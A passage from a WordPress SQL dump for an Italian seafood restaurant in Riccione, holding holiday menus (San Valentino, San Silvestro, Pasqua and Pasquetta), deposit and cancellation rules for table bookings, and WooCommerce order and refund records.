persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età, (in caso di eventuale eccedenza di caparra, l’importo verrà conguagliato sul totale) nome di chi prenota e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione e ricevere il rimborso della caparra, entro e non oltre le ore 12,00 di giovedì 29 dicembre , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante, dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci al ristorante fino all’11 e dal 27 dicembre, mentre dal 12 al 26 dicembre(causa chiusura per ferie), potete contattarci alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica postasolymar@libero.it.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menu di San Silvestro 2017','','inherit','closed','closed','','225-revision-v1','','','2017-02-04 09:52:37','2017-02-04 08:52:37','',225,'http://www.ristorantesolymar.it/2017/02/04/225-revision-v1/',0,'revision','',0),(295,1,'2017-02-09 03:49:27','2017-02-09 02:49:27','','Order &ndash; febbraio 9, 2017 @ 03:49 AM','','wc-cancelled','open','closed','order_589bc3ff14bf5','ordine-feb-09-2017-0121-am','','','2017-02-09 03:49:27','2017-02-09 02:49:27','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=295',0,'shop_order','',1),(296,1,'2017-02-09 15:38:20','2017-02-09 14:38:20','','Order &ndash; febbraio 9, 2017 @ 03:38 PM','','wc-cancelled','open','closed','order_589c76861fcd2','ordine-feb-09-2017-0202-pm','','','2017-02-09 15:38:20','2017-02-09 14:38:20','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=296',0,'shop_order','',1),(297,1,'2017-02-09 15:26:41','2017-02-09 14:26:41','','Order &ndash; febbraio 9, 2017 @ 03:26 PM','','wc-processing','open','closed','order_589c7b7e033cf','ordine-feb-09-2017-0223-pm','','','2017-02-09 15:26:41','2017-02-09 14:26:41','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=297',0,'shop_order','',3),(298,1,'2017-02-09 18:00:40','2017-02-09 17:00:40','','Order &ndash; febbraio 9, 2017 @ 06:00 PM','','wc-processing','open','closed','order_589c9fe4b27b0','ordine-feb-09-2017-0459-pm','','','2017-02-09 18:00:40','2017-02-09 17:00:40','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=298',0,'shop_order','',3),(299,1,'2017-02-09 19:19:10','2017-02-09 18:19:10','','Order &ndash; febbraio 9, 2017 @ 07:19 PM','Riccardo','wc-processing','open','closed','order_589cb276ea3e1','ordine-feb-09-2017-0618-pm','','','2017-02-09 19:19:10','2017-02-09 18:19:10','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=299',0,'shop_order','',3),(301,1,'2017-02-09 19:38:38','2017-02-09 18:38:38','&nbsp;\r\n<h2>14 Febbraio\r\n\"Semplicemente \"</h2>\r\n<strong>Menu\'</strong>\r\n<em>Crudo di gamberi rosa con salsa di gamberi, cocco e zenzero</em>\r\n\r\nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\r\n\r\nParmigiana di triglia\r\n\r\nNegativo di scoglio (Primo )\r\n\r\nFiletto di cernia con carciofi e arancio\r\n\r\nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime\r\n\r\n90€ coppia\r\n45 € per i singoli\r\nBevande escluse\r\n\r\nOrario di inizio 20,15\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2017</strong>\r\n[product_category category=\"san-valentino\"]\r\n\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menù di San Valentino 2017','','inherit','closed','closed','','283-revision-v1','','','2017-02-09 19:38:38','2017-02-09 18:38:38','',283,'http://www.ristorantesolymar.it/2017/02/09/283-revision-v1/',0,'revision','',0),(302,1,'2017-02-09 20:45:46','2017-02-09 19:45:46','','Order &ndash; febbraio 9, 2017 @ 08:45 PM','','wc-cancelled','open','closed','order_589cb82408ca7','ordine-feb-09-2017-0642-pm','','','2017-02-09 20:45:46','2017-02-09 19:45:46','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=302',0,'shop_order','',1),(303,1,'2017-02-09 19:51:53','2017-02-09 18:51:53','<h2>14 Febbraio\r\n\"Semplicemente \"</h2>\r\n<strong>Menu\'</strong>\r\n<em>Crudo di gamberi rosa con salsa di gamberi, cocco e zenzero</em>\r\n\r\nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\r\n\r\nParmigiana di triglia\r\n\r\nNegativo di scoglio (Primo )\r\n\r\nFiletto di cernia con carciofi e arancio\r\n\r\nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime\r\n\r\n90€ coppia\r\n45 € per i singoli\r\nBevande escluse\r\n\r\nOrario di inizio 20,15\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2017</strong>\r\n[product_category category=\"san-valentino\"]\r\n\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menù di San Valentino 2017','','inherit','closed','closed','','283-revision-v1','','','2017-02-09 19:51:53','2017-02-09 18:51:53','',283,'http://www.ristorantesolymar.it/2017/02/09/283-revision-v1/',0,'revision','',0),(304,1,'2017-02-10 14:35:22','2017-02-10 13:35:22','','Order &ndash; febbraio 10, 2017 @ 02:35 PM','','wc-processing','open','closed','order_589dc16ee6c64','ordine-feb-10-2017-0134-pm','','','2017-02-10 14:35:22','2017-02-10 13:35:22','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=304',0,'shop_order','',3),(305,1,'2017-02-10 21:57:56','2017-02-10 20:57:56','','Order &ndash; febbraio 10, 2017 @ 09:57 PM','','wc-processing','open','closed','order_589e289083e44','ordine-feb-10-2017-0854-pm','','','2017-02-10 21:57:56','2017-02-10 20:57:56','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=305',0,'shop_order','',3),(306,1,'2017-02-11 13:06:09','2017-02-11 12:06:09','','Order &ndash; febbraio 11, 2017 @ 01:06 PM','','wc-processing','open','closed','order_589efdbd24dfd','ordine-feb-11-2017-1204-pm','','','2017-02-11 13:06:09','2017-02-11 12:06:09','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=306',0,'shop_order','',3),(307,1,'2017-02-11 20:10:18','2017-02-11 19:10:18','','Order &ndash; febbraio 11, 2017 @ 08:10 PM','','wc-processing','open','closed','order_589f616c894fb','ordine-feb-11-2017-0709-pm','','','2017-02-11 20:10:18','2017-02-11 19:10:18','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=307',0,'shop_order','',3),(308,1,'2017-02-12 11:22:49','2017-02-12 10:22:49','','Order &ndash; febbraio 12, 2017 @ 11:22 AM','','wc-cancelled','open','closed','order_58a034c37b9c9','ordine-feb-12-2017-1011-am','','','2017-02-12 11:22:49','2017-02-12 10:22:49','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=308',0,'shop_order','',1),(309,1,'2017-02-12 12:08:21','2017-02-12 11:08:21','','Order &ndash; febbraio 12, 2017 @ 12:08 PM','','wc-cancelled','open','closed','order_58a037c302a57','ordine-feb-12-2017-1024-am','','','2017-02-12 12:08:21','2017-02-12 11:08:21','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=309',0,'shop_order','',1),(310,1,'2017-02-12 15:21:05','2017-02-12 14:21:05','','Order &ndash; febbraio 12, 2017 @ 03:21 PM','','wc-processing','open','closed','order_58a06ddf1c3b4','ordine-feb-12-2017-0214-pm','','','2017-02-12 15:21:05','2017-02-12 14:21:05','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=310',0,'shop_order','',3),(311,1,'2017-02-12 22:59:07','2017-02-12 21:59:07','','Order &ndash; febbraio 12, 2017 @ 10:59 PM','','wc-processing','open','closed','order_58a0da6e83edf','ordine-feb-12-2017-0958-pm','','','2017-02-12 22:59:07','2017-02-12 21:59:07','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=311',0,'shop_order','',3),(312,1,'2017-02-13 12:07:18','2017-02-13 11:07:18','','Order &ndash; febbraio 13, 2017 @ 12:07 PM','','wc-refunded','open','closed','order_58a1904fd8d6f','ordine-feb-13-2017-1054-am','','','2017-02-13 15:42:51','2017-02-13 14:42:51','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=312',0,'shop_order','',4),(313,1,'2017-02-13 12:03:12','2017-02-13 11:03:12','','Order &ndash; febbraio 13, 2017 @ 12:03 PM','','wc-processing','open','closed','order_58a191b760ebd','ordine-feb-13-2017-1100-am','','','2017-02-13 12:03:12','2017-02-13 11:03:12','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=313',0,'shop_order','',3),(314,1,'2017-02-13 13:13:29','2017-02-13 12:13:29','','Order &ndash; febbraio 13, 2017 @ 01:13 PM','','wc-processing','open','closed','order_58a1a2c177055','ordine-feb-13-2017-1212-pm','','','2017-02-13 13:13:29','2017-02-13 12:13:29','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=314',0,'shop_order','',3),(315,1,'2017-02-13 15:42:52','2017-02-13 14:42:52','','Rimborso &ndash; Feb 13, 2017 @ 02:42 PM','Ordine Rimborsato Completamente','wc-completed','closed','closed','refund_58a1c5ec04651','rimborso-feb-13-2017-0242-pm','','','2017-02-13 15:42:52','2017-02-13 14:42:52','',312,'http://www.ristorantesolymar.it/shop_order_refund/rimborso-feb-13-2017-0242-pm/',0,'shop_order_refund','',0),(316,1,'2017-02-13 19:53:58','2017-02-13 18:53:58','','Order &ndash; febbraio 13, 2017 @ 07:53 PM','','wc-processing','open','closed','order_58a1ffd34c59e','ordine-feb-13-2017-0649-pm','','','2017-02-13 19:53:58','2017-02-13 18:53:58','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=316',0,'shop_order','',3),(318,1,'2017-02-14 10:42:57','2017-02-14 09:42:57','','Order &ndash; febbraio 14, 2017 @ 10:42 AM','','wc-cancelled','open','closed','order_58a2c604778a9','ordine-feb-14-2017-0855-am','','','2017-02-14 10:42:57','2017-02-14 09:42:57','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=318',0,'shop_order','',1),(319,1,'2017-02-14 13:16:58','2017-02-14 12:16:58','','Order &ndash; febbraio 14, 2017 @ 01:16 PM','','wc-processing','open','closed','order_58a2f50b8756f','ordine-feb-14-2017-1216-pm','','','2017-02-14 13:16:58','2017-02-14 12:16:58','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=319',0,'shop_order','',3),(322,1,'2017-03-21 21:15:42','2017-03-21 20:15:42','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 2 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 2 persone (30euro x 2)\r\n\r\n<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 2 Persone - Pasqua','Prenotazione tavolo per 2 persone per il giorno di Pasqua','publish','closed','closed','','prenotazione-tavolo-per-2-persone-pasqua','','','2019-04-20 20:08:36','2019-04-20 18:08:36','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasqua/',1,'product','',0),(323,1,'2017-03-21 21:21:18','2017-03-21 20:21:18','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 3 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 3 persone (30euro x 3)\r\n\r\n<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 3 Persone - Pasqua','Prenotazione tavolo per 3 persone per il giorno di Pasqua','publish','closed','closed','','prenotazione-tavolo-per-3-persone-pasqua','','','2019-04-20 17:55:59','2019-04-20 15:55:59','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-3-persone-pasqua/',1,'product','',0),(324,1,'2017-03-21 21:22:50','2017-03-21 20:22:50','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 4 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 4 persone (30euro x 4)\r\n\r\n<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 4 Persone - Pasqua','Prenotazione tavolo per 4 persone per il giorno di Pasqua','publish','closed','closed','','prenotazione-tavolo-per-4-persone-pasqua','','','2019-04-20 19:45:07','2019-04-20 17:45:07','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-pasqua/',1,'product','',0),(325,1,'2017-03-21 21:24:06','2017-03-21 20:24:06','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 5 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 5 persone (30euro x 5)\r\n\r\n<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 5 Persone - Pasqua','Prenotazione tavolo per 5 persone per il giorno di Pasqua','publish','closed','closed','','prenotazione-tavolo-5-persone-pasqua','','','2019-04-20 23:04:20','2019-04-20 21:04:20','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-5-persone-pasqua/',1,'product','',0),(326,1,'2017-03-21 21:26:02','2017-03-21 20:26:02','Tavolo per 6 persone giorno di Pasqua 2017 - anticipo caparra confirmatoria. La caparra si intende per 6 persone (25euro x 6)','Prenotazione Tavolo per 6 Persone - Pasqua','Prenotazione tavolo per 6 persone per il giorno di Pasqua','inherit','closed','closed','','325-autosave-v1','','','2017-03-21 21:26:02','2017-03-21 20:26:02','',325,'http://www.ristorantesolymar.it/2017/03/21/325-autosave-v1/',0,'revision','',0),(327,1,'2017-03-22 20:43:22','2017-03-22 19:43:22','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 2 persone giorno di Pasquetta - anticipo caparra confirmatoria. La caparra si intende per 2 persone (30euro x 2)\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 2 Persone - Pasquetta','Prenotazione tavolo per 2 persone per il giorno di Pasquetta','publish','closed','closed','','prenotazione-tavolo-per-2-persone-pasquetta','','','2019-04-22 11:00:10','2019-04-22 09:00:10','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-pasquetta/',1,'product','',0),(328,1,'2017-03-22 20:45:51','2017-03-22 19:45:51','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 3 persone giorno di Pasquetta - anticipo caparra confirmatoria. La caparra si intende per 3 persone (30euro x 3)\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in 